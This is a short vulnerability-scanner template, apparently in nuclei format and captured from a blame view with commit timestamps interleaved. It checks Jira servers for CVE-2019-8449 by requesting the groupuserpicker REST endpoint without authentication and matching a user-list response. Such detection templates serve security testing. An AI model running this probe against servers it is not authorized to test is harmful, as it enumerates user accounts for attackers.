2020-06-30 10:36:15 +00:00
|
|
|
id: CVE-2019-8449
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: JIRA Unauthenticated Sensitive Information Disclosure
|
|
|
|
author: Harsh Bothra
|
|
|
|
severity: medium
|
|
|
|
|
|
|
|
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-06-30 10:36:15 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
2020-07-02 10:06:11 +00:00
|
|
|
- '{"users":{"users":'
|
2020-06-30 10:36:15 +00:00
|
|
|
part: body
|